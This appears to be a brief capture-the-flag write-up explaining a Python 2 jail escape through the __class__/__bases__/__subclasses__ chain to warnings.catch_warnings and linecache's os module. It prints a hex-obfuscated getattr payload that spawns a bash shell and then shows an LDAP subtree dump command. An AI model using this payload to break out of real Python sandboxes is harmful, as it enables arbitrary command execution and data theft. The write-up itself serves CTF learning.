Rating:
The general procedure to go through this jail is in the following steps:
-1. Get an instance of a class. **()** is commonly used, which is an object of the tuple class.
-2. Get the reference of that class using the __class__ property.
-3. “Elevate” to the object class using the __base__ property.
-4. Go down to the __subclasses__() method, which returns a list with references to all the standard classes of the language.
-5. Create an instance of a class which has some potential. file class can be used to read **directive.py** file. However, **warning.catch_warnings** is also used, which is more interesting: it has a **_module** property that is a reference to the whole module, so it’s possible to get the reference to **linecache** which contains the **os** module.
final payload which runs os.system("/bin/bash"):
```py
getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr((), "\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"), "\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")[0], "\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()[59],"\x5f\x5f\x72\x65\x70\x72\x5f\x5f"),"\x69\x6d\x5f\x66\x75\x6e\x63"),"\x66\x75\x6e\x63\x5f\x67\x6c\x6f\x62\x61\x6c\x73")["linecache"],"\x6f\x73"),"\x73\x79\x73\x74\x65\x6d")("\x62\x61\x73\x68")
```
After getting the interactive shell, it's just a matter of dumping ldap subtree through python prompt directly without going through the jail file.
```
conn.search_s("dc=fwordctfdomain,dc=org",ldap.SCOPE_SUBTREE)
```
and that's it.